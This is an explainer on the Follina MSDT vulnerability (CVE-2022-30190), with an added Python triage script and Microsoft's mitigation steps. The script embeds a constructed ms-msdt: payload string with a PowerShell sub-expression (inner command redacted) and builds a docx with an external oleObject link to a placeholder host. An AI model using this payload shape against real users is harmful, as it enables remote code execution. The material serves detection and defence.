Follina (CVE-2022-30190)

Follina is a remote code execution flaw in the Microsoft Support Diagnostic Tool (MSDT) reached from a crafted Word or RTF document; it needs no macros, and the RTF form fires from the Explorer Preview Pane without the file being opened.

Definition

Follina (CVE-2022-30190) is a remote code execution vulnerability in the Microsoft Support Diagnostic Tool (MSDT, `msdt.exe`), the troubleshooting component Windows registers as the handler for the `ms-msdt:` URI scheme. In the published attack chain a Word document carries, in `word/_rels/document.xml.rels`, an `oleObject` relationship with `TargetMode="External"` whose target is an attacker-controlled HTML page. Word fetches that page when the document is opened and renders it with the MSHTML engine; script in the page navigates to an `ms-msdt:` URI, which Windows hands to `msdt.exe`. The URI selects the `PCWDiagnostic` troubleshooting pack with `/skip force` and supplies a `/param` string whose `IT_BrowseForFile` value embeds a PowerShell sub-expression (`$(...)`); MSDT evaluates the parameter, so the embedded command runs with the privileges of the user who opened the document. No macro is involved anywhere in the chain, so Office's macros-disabled default gives no protection. Delivered as RTF, the same payload triggers when Explorer's Preview Pane renders the file, without a click on the document.
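The following Python triage script is an added example; it is not part of the original page and is not Microsoft's code or code from any Follina write-up. It checks the two artefacts described above against constructed inputs: an in-memory `.docx` whose `document.xml.rels` carries an external `oleObject` relationship, and a constructed copy of the HTML stage in the public sample's shape, whose `ms-msdt:` URI is extracted and split into pack, switches and `IT_*` parameters. It goes slightly beyond the text by also flagging `attachedTemplate` relationships, the remote-template variant of the same fetch. The URL `example.invalid` and the placeholder PowerShell string are constructed for the example; the relationship types and the PCWDiagnostic parameter names follow the public sample.

```python
"""Static triage of a Follina (CVE-2022-30190) delivery chain (added example, constructed data)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that make Word fetch a remote part when the document is opened.
REMOTE_FETCH_TYPES = ("oleObject", "attachedTemplate")


def find_external_links(docx_bytes: bytes) -> list:
    """Return external http(s) relationships of a remote-fetching type from word/_rels/*.rels."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if rtype in REMOTE_FETCH_TYPES and urlparse(target).scheme.lower() in ("http", "https"):
                    hits.append({"part": name, "type": rtype, "target": target})
    return hits


def extract_msdt_uris(html: str) -> list:
    """Pull ms-msdt: URIs out of HTML/JS, honouring the quote that opened the literal and backslash escapes."""
    uris, pos, lower = [], 0, html.lower()
    while True:
        start = lower.find("ms-msdt:", pos)
        if start == -1:
            return uris
        quote = html[start - 1] if start and html[start - 1] in "\"'" else None
        buf, i = [], start
        while i < len(html):
            ch = html[i]
            if ch == "\\" and i + 1 < len(html):  # \" inside the JS literal is a literal quote
                buf.append(html[i + 1])
                i += 2
                continue
            if (quote and ch == quote) or (not quote and ch.isspace()) or ch == "\n":
                break
            buf.append(ch)
            i += 1
        uris.append("".join(buf))
        pos = i + 1


def classify_msdt_uri(uri: str) -> dict:
    """Split an ms-msdt: URI into pack, switches and IT_* parameters; flag PowerShell sub-expressions."""
    pack = re.search(r"/id\s+(\S+)", uri, re.I)
    param_blob = re.search(r'/param\s+"?(.*?)"?\s*$', uri, re.I | re.S)
    params = {}
    if param_blob:
        # PCWDiagnostic keys all start with IT_; split before each key so values may contain spaces.
        for chunk in re.split(r"\s+(?=IT_\w+=)", param_blob.group(1).strip()):
            if chunk:
                key, _, value = chunk.partition("=")
                params[key] = value
    injected = [k for k, v in params.items() if "$(" in v]
    pack_name = pack.group(1) if pack else None
    if injected and pack_name and pack_name.lower() == "pcwdiagnostic":
        verdict = "follina-like"
    elif injected:
        verdict = "injected-subexpression"
    else:
        verdict = "no-injection"
    return {"pack": pack_name, "skip_prompts": bool(re.search(r"/skip\s+force", uri, re.I)),
            "params": params, "injected_params": injected, "verdict": verdict}


def build_sample_docx(target_url: str = "") -> bytes:
    """Construct a minimal .docx; with a target_url, document.xml.rels gets an external oleObject link."""
    external = (f'<Relationship Id="rId2" Type="{OOXML_REL}oleObject" '
                f'Target="{target_url}" TargetMode="External"/>') if target_url else ""
    rels = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="{REL_NS}">'
            f'<Relationship Id="rId1" Type="{OOXML_REL}styles" Target="styles.xml"/>{external}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")   # placeholder parts; only the .rels matters here
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed page in the shape of the public Follina HTML stage; the inner PowerShell is a placeholder.
SAMPLE_HTML = (
    "<!doctype html><html><body><script>\n"
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed '
    "IT_BrowseForFile=h$(Invoke-Expression('REDACTED'))i/../../../../../../../../Windows/System32/mpsigstub.exe "
    'IT_AutoTroubleshoot=ts_AUTO\\"";\n'
    "</script></body></html>"
)

if __name__ == "__main__":
    for link in find_external_links(build_sample_docx("http://example.invalid/payload.html")):
        print("external fetch on open:", link)
    for uri in extract_msdt_uris(SAMPLE_HTML):
        print("ms-msdt URI:", classify_msdt_uri(uri))
```

The `$(` check is deliberately narrow: `ms-msdt:` links with `IT_*` parameters occur in legitimate help content, so the signal is a sub-expression inside a parameter value, not the presence of the scheme itself.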

Mitigation

Microsoft's workaround, published on 30 May 2022 in MSRC's guidance for CVE-2022-30190, was to disable the `ms-msdt:` URL protocol by exporting and then deleting the `HKEY_CLASSES_ROOT\ms-msdt` registry key (`reg export`, then `reg delete`); troubleshooters stay reachable through the Get Help app and Settings, but links can no longer start MSDT. The fix shipped in the June 2022 security updates (Patch Tuesday, 14 June 2022), after which the saved key can be imported again. Two defence-in-depth controls also break the chain: the Defender for Endpoint attack surface reduction rule that blocks Office applications from creating child processes, and Protected View, which stops the remote fetch for documents carrying the Mark of the Web, though it does not cover the RTF Preview Pane path.
